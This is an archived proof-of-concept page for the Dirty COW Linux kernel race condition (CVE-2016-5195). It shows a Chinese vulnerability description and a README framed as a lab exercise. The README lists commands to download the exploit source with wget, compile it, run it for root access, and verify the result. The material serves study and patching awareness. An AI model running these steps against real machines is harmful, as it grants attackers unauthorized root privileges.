Goal Reached Thanks to every supporter — we hit 100%!

Goal: 1000 CNY · Raised: 1000 CNY

100.0%

CVE-2016-5195 PoC — Linux kernel 竞争条件问题漏洞

Source
Associated Vulnerability
Title:Linux kernel 竞争条件问题漏洞 (CVE-2016-5195)
Description:Linux kernel是美国Linux基金会的开源操作系统Linux所使用的内核。 Linux kernel 2.x至4.8.3之前的4.x版本中的mm/gup.c文件存在竞争条件问题漏洞,该漏洞源于程序没有正确处理copy-on-write(COW)功能写入只读内存映射。本地攻击者可利用该漏洞获取权限。
Description
Linux privilege escalation using Dirty COW exploit (CVE-2016-5195).
Readme
# Linux Privilege Escalation (Dirty COW – CVE-2016-5195)

##  Project Overview
This project demonstrates privilege escalation on a vulnerable Linux kernel using the **Dirty COW exploit (CVE-2016-5195)**.  
By exploiting a race condition in the kernel’s memory handling, a normal user was able to escalate privileges to **root access**.  

---

##  Tools & Environment
- Vulnerable Linux VM (e.g., Metasploitable2 or custom kernel)  
- Dirty COW exploit (C source code)  
- GCC (GNU Compiler Collection)  

---

##  Steps & Methodology

 **1.Check kernel version (confirm vulnerability):**
      uname -r
 
 **2.Download Dirty COW exploit code:**
      wget https://raw.githubusercontent.com/dirtycow/dirtycow.github.io/master/dirtyc0w.c -O dirty.c
 
 **3.Compile the exploit:**
      gcc -pthread dirty.c -o dirty -lcrypt

 **4.Execute the exploit to escalate privileges:**
      ./dirty

 **5.Verify root access:**
      whoami
      id

   **Learning Outcomes**

         Practical experience in Linux privilege escalation.

         Understanding kernel-level vulnerabilities and exploitation.

         Importance of regular patching & kernel hardening to defend against such attacks.
File Snapshot

[4.0K] /data/pocs/5a4606612375e30684bc235fc543829fc7d5d637 └── [1.2K] README.md 0 directories, 1 file
Shenlong Bot has cached this for you
Remarks
    1. It is advised to access via the original source first.
    2. If the original source is unavailable, please email f.jinxu#gmail.com for a local snapshot (replace # with @).
    3. Shenlong has snapshotted the POC code for you. To support long-term maintenance, please consider donating. Thank you for your support.